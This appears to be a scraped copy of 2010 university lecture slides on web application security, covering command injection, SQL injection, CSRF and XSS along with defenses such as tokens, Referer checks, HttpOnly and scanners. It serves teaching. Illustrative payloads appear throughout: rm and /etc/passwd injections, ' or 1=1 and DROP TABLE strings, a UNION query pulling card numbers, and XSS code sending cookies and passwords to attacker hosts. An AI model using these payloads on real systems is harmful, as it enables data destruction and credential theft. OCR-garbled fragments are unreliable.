Web Application Security: Reported Web Vulnerabilities 'In the Wild', Study notes of Computer Networks

Download Web Application Security: Reported Web Vulnerabilities 'In the Wild' and more Study notes Computer Networks in PDF only on Docsity! CS 155 Spring 2010 Web Application Security John Mitchell Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities Command Injection General code injection attacks Attack goal: execute arbitrary code on the server Example code injection based on eval (PHP) http://site.com/calc.php (server side calculator) … $in = $_GET[‘exp']; eval('$ans = ' . $in . ';'); … Attack http://site.com/calc.php?exp=“ 10 ; system(‘rm *.*’) ” (URL encoded) Code injection using system() Example: PHP server-side code for sending email $email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”) Attacker can post http://yourdomain.com/mail.php? email=hacker@hackerhome.net & subject=foo < /usr/passwd; ls OR http://yourdomain.com/mail.php? email=hacker@hackerhome.net&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls Basic picture: SQL Injection Victim Server 1 unintended SQLreceive valuable data 2 3 Attacker query 10 Victim SQL DB CardSystems Attack CardSystems  credit card payment processing company  SQL injection attack in June 2005  put out of business The Attack  263,000 credit card #s stolen from database  credit card #s stored unencrypted  43 million credit card #s exposed 11 April 2008 SQL Vulnerabilities Hania tee at| 0071041 D0) TAN KREBS. SECURITY FIN Brian Krebs on Computer Security About This Blog | Archives | EQ]YRSSFeed (What's RSS?) Hundreds of Thousands of Microsoft Web Servers Hacked Hundreds of thousands of Web sites - including several at the United Nations and in the U.K. government -- have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors’ machines. The attackers appear to be breaking into the sites with the help of a security vulnerability in Microsoft's Internet Information Services (IS) Web servers. Tn an alert issued last week, Microsoft said it was investigating reports of an unpatched flaw in IS servers, but at the time it noted that it wasn't aware of anyone trying to exploit that particular weakness. Update, April 29, 11:28 a.m. ET: In a post to one of its blogs. Microsoft says this attack was ~of the fault of a flaw in IIS: "_.our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are inno way related to Microsoft Security Advisory (951306). The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application's database. To protect against SQL injection attacks the developer of the Web site or over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations." Shadowserver.org has a nice writeup with a great deal more information about the mechanics behind this attack. as does the SANS Internet Storm Center. Enter WebWeb Username & Password SELECT * FROM Users WHERE user='me' ServerBrowser (Client) DB AND pwd='1234' Normal Query Bad input Suppose user = “ ' or 1=1 -- ” (URL encoded) Then scripts does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … ) The “ ” causes rest of line to be ignored -- .  Now ok.EOF is always false and login succeeds. The bad news: easy login to many sites this way. 16 Even worse Suppose user = “ ′ ; DROP TABLE Users -- ” Then script does: ok = execute( SELECT … WHERE user= ′ ′ ; DROP TABLE Users … ) Deletes user table 17  Similarly: attacker can add users, reset pwds, etc. Getting private info 4 View History - Microsoft Internet... Sims : File Edit View Favorites Tools Help Pi (O=-O HAG . * View pizza order history: Month| Jan ¥ 20 Getting private info “SELECT pizza, toppings, quantity, dateSQL FROM orders WHERE userid=” . $userid . “AND order month=” GET[‘month’] Query _ . _ What if: month = “ 0 AND 1 0 = UNION SELECT name, CC_num, exp_mon, exp_year FROM creditcards ” File Edit View Go Bookmarks Tools Help @->- BO @ roms] Oo (GL Your Pizza Orders in October: Credit Card Info Compromised Pizza Toppings Quantity |Order Day [Nei Daswam 1234 12349999 1111 2007 1234 4321 3333 2222 2008 \Anita Kesavan 2354 7777 1111 1234 2007 22  WY Cross Site Request Forgery R | ecall: session using cookies Browser Se POST/login.cgi rver Set-cookie: authenticator Basic picture Server Victim 1 2 4 User Victim Attack Server 28 Q: how long do you stay logged on to Gmail? Cookieless Example: Home Router Home router 1 4 U 2 3 Bad web siteser 31 Attack on Home Router Fact: [SRJ’07]  50% of home users have broadband router with a default or no password Drive-by Pharming attack: User visits malicious site  JavaScript at site scans home network looking for b db d troa an rou er: • SOP allows “send only” messages • Detect success using onerror: <IMG SRC=192.168.0.1 onError = do() >  Once found, login to router and change DNS server Problem: “send-only” access sufficient to reprogram router CSRF Defenses Secret Validation Token <input type=hidden value=23a3af01b> Referer Validation Referer: http://www.facebook.com/home.php Custom HTTP Header X‐Requested‐By: XMLHttpRequest Referer Validation Facebook Login For your security, never enter your Facebook password on sites not located on Facebook.com. Email: Password: [~ Remember me or Sign up for Facebook Forgot your password? Referer Validation Defense HTTP Referer header  Referer: http://www.facebook.com/  Referer: http://www.attacker.com/evil.html  ? Referer: Lenient Referer validation Doesn't work if Referer is missing Strict Referer validaton  Secure but Referer is sometimes absent, … Referer Privacy Problems Referer may leak privacy-sensitive information http://intranet.corp.apple.com/ projects/iphone/competitors.html Common sources of blocking:  Network stripping by the organization  Network stripping by local machine  Stripped by browser for HTTPS -> HTTP transitions  User preference in browser  Buggy user agents Site cannot afford to block these users Broader view of CSRF Abuse of cross-site data export feature  From user’s browser to honest server  Disrupts integrity of user’s session Why mount a CSRF attack?  Network connectivity Read browser state  Write browser state Not just “session riding” Login CSRF Victim Browser f ) oD GET /blog HTTP/1.1 www.attacker.com www.google.com <form action=https://www.google.com/login method=POST target=invisibleframe> <input name=username value=attacker> <input name=password value=xyzzy> </form> <script>document.forms[0].submit(}</script> POST /login HTTI¥ 1.1 Referer: http://yjww.attacker.com/blog username=atta@ker&password=xyzzy HTTP/1.1 200 OK GET /search?q=llamas HTTP/1.1 Cookie: SessionID=ZA1Fa34 Web History for attacker Apr 7, 2008 9:20pm Searched for llamas el Payments Login CSRF ( [http://www kaniiquizzer.comhelp/faq.php ‘Quizzer provides an intemace Tor studying these images. Wow! This site is so cool! How can! show my appreciation? Sura-Sura Kanji Quizzer is supported by banner advertisements, but you can also support Sura-Sura Kanji Quizzer via PayPal donation: How does the quizzer choose which kanji to display? The displayed kanji is chosen at randam from among the active kanji. Special effort is taken to avoid displaying the same kanji twice in a row. It might still happen, however, if only one kanji is active. How should | use the Sura-Sura Kanji Quizzer service? All we ask is that you use the quizzer honestly. Bad data will make the statistics less useful. How does the quizzer calculate the "success rate" of a user? The formula is (Times Succeeded) / (Times Viewed). If you view a kanji but do not click the "Success" button (for example, if you click a link to some other part of the ito) that counte sasinct woe to DI low movt_ sai + Jo_alout Payments Login CSRF : Waimnn payed ond faites: Miptdessssienetx 77 | [G)-|c FAO -Sura-Sura Keni Quizzer || Pyadd a Bank Account in the United..£3) wweou | ttey | Seumlvcaues [| Search a PayPal Add a Bank Account in the United States Secwy Transaction PayFa frotecis he privacy ofthe your tnancial Information regardless of yur pay nant Source. T1Is 2en< accountwill become the default funding scu'ce for mes: cf your PayPal payments, however you may change this funding source when you mace a payment Revialw oLr ceduvalion paue tu learn rie abgul2ayPal gulisies anid your payrnentswuree righs aid rerr edi. ‘The sefety and security of your 22ns accountinformation is protected by PeyPl. We protect agains! unauthorized withdrawals from your tank account‘o your PeyPel account Plus, we will noify you by email whenever you deposit cr withdraw funds from this bank accourt usirg Payra. Country: Lnted S'ates ‘serene secon Song Osavinus US. Check Sampio seuss our wagts) “Account Number: (217 icity “Types comes before the i synl. ts ecect losatcn and nurrber of igs varies tom bank fo bank “Re-enter Account Number: Login CSRF Victim Browser is PD GET /blog HTTP/1.1 www.attacker.com www.google.com <form action=https://www.google.com/login method=POST target=invisibleframe> <input name=username value=attacker> <input name=password value=xyzzy> </form> <script>document.forms[0].submit()</script> HTTP/1.1 200 OK Set-Cookie: SessionID=ZA1Fa34_ llamas HTTP/1.1 Cookie: SessionID=ZA1Fa34 Web History for attacker Apr 7, 2008 9:20pm. Searched for llamas el Sites can redirect browser Cross Site Scripting (XSS) Three top web site vulnerabilites SQL Injection  Browser sends malicious input to server  Bad input checking leads to malicious SQL query Attacker’s malicious code executed on victim server CSRF – Cross-site request forgery  Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site At acker site forges request from victim browser to victim server XSS – Cross-site scripting  Bad web site sends innocent victim a script that Attacker’s malicious code steals information from an honest web site executed on victim browser Basic scenario: reflected XSS attack Attack Server 1 2 5 Victim Server Victim client Attack Server www.attacker.com http://victim.com/search.php ? term = <script> ... </script> Victim client <html> Victim Server www.victim.com Results for <script> window.open(http://attacker.com? d t ki )... ocumen .coo e ... </script> </html> What is XSS? An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application Methods for injecting malicious code:  Reflected XSS (“type 1”)  the attack script is reflected back to the user as part of a page from the victim site  Stored XSS (“type 2”)  the attacker stores the malicious code in a resource managed by the web application, such as a database Others such as DOM based attacks , - Basic scenario: reflected XSS attack Attack ServerEmail version 1 2 5 Server Victim User Victim Here’s how the attack works: Attacker locates a PDF file hosted on website.com Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion http://website.com/path/to/file.pdf#s=javascript:alert(”xss”);) Attacker entices a victim to click on the link If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes Note: alert is just an example. Real attacks do something worse. And if that doesn’t bother you ... PDF files on the local filesystem: file:///C:/Program%20Files/Adobe/Acrobat%2 07.0/Resource/ENUtxt.pdf#blah=javascript:al ert("XSS"); JavaScript Malware now runs in local context with the ability to read local files ... Reflected XSS attack Attack Server 5 Server Victim User Victim Send bad stuff Reflect it back Stored XSS using images Suppose pic jpg on web server contains HTML ! .  request for http://site.com/pic.jpg results in: HTTP/1 1 200 OK. … Content-Type: image/jpeg <html> fooled ya </html>  IE will render this as HTML (despite Content-Type) • Consider photo sharing sites that support image uploads • What if attacker uploads an “image” that is a script? DOM-based XSS (no server used) Example page <HTML><TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos = document.URL.indexOf("name=") + 5; document.write(document.URL.substring(pos,do cument.URL.length)); </SCRIPT> </HTML> Works fine with this URL http://www example com/welcome html?name=Joe. . . But what about this one? http://www.example.com/welcome.html?name= /<script>alert(document.cookie)< script> Amit Klein ... XSS of the Third Kind AJAX hijacking AJAX programming model adds additional attack vectors to some existing vulnerabilities Client-Centric model followed in many AJAX applications can help hackers or , even open security holes J S i t ll f ti t b d fi d ava cr p a ows unc ons o e re e ne after they have been declared … Complex problems in social network sites User data User- supplied application Defenses at server Attack Server 1 2 5 Server Victim User Victim How to Protect Yourself (OWASP) The best way to protect against XSS attacks:  Ensure that your app validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed.  Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content.  We strongly recommend a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete. ASP NET output filtering. validateRequest: (on by default) Crashes page if finds <script> in POST data .  Looks for hardcoded list of patterns  Can be disabled: <%@ Page validateRequest=“false" %> Caution: Scripts not only in <script>! JavaScript as scheme in URI  <img src=“javascript:alert(document.cookie);”> JavaScript On{event} attributes (handlers)  OnSubmit, OnError, OnLoad, … Typical use:  <img src=“none” OnError=“alert(document.cookie)”>  <iframe src=`https://bank.com/login` onload=`steal()`>  <form> action="logon.jsp" method="post" onsubmit "hackImg new Image;= = hackImg.src='http://www.digicrime.com/'+document.for ms(1).login.value'+':'+ document.forms(1).password.value;" </form> Problems with filters Suppose a filter removes <script  Good case <script src=“ ”  src=“ ” ... ...  But then <scr<scriptipt src=“ ...”  <script src=“ ...” Advanced anti-XSS tools Dynamic Data Tainting  Perl taint mode Static Analysis  Analyze Java, PHP to determine possible flow of untrusted input Client-side XSS defenses  Proxy-based: analyze the HTTP traffic exchanged between user’s web browser and the target web server by scanning for special HTML characters and encoding them before executing the page on the user’s web browser  Application-level firewall: analyze browsed HTML pages for hyperlinks that might lead to leakage of sensitive information and stop bad requests using a set of connection rules .  Auditing system: monitor execution of JavaScript code and compare the operations against high- level policies to detect malicious behavior HttpOnly Cookies IE6 SP1, FF2.0.0.5 GET … (not Safari?) Browser Server HTTP Header: Set-cookie: NAME=VALUE ; HttpOnly • Cookie sent over HTTP(s), but not accessible to scripts • cannot be read via document.cookie • Also blocks access from XMLHttpRequest headers • Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs. Finding vulnerabilities Survey of Web Vulnerability Tools Local Remote >$100K t t l t il i o a re a pr ce Example scanner Ul Security Account Feed Pel Tools Support Logout Security Dashboard Security Device Compliance Network IP Addresses Status Dashboard @ Not Compliant & Compliant nee Unread Alerts —_ 1% Network Scans In Progress Discovery Device Audits In Progress DNS Networks Pending Approval McAfee Secure PCI Networks @ Open @Alive O Offline Audits Vulnerabilities By Severity Recent Vulnerabilities Device Open Ports Devices Vulnerabilities 3 25 5 20 4 Dynamic IP 20 15 3 10: 2 Reports pt 10 5 L 0: 0 0 B 1lLow @ 3High @ 5 Critical @ 24Hours O 1 Week @None O6-10 mo >20 BD 2Medium @ 4 Critical @ 72Hours @ 1 Month B1-5 wi1-20 Vulnerability Detection Scanners Overall detection rate Malware 0 Info leak Contig Session SQL 2nd order SQL 1st order CSRF xCS XSS advance XSS type 2 XSS type 1 Additional solutions Web Application Firewalls Help prevent some attacks we discuss today: • Cross site scripting • SQL Injection • Form field tampering • Cookie poisoning Sample products: Imperva Kavado Interdo F5 TrafficShield Citrix NetScaler CheckPoint Web Intel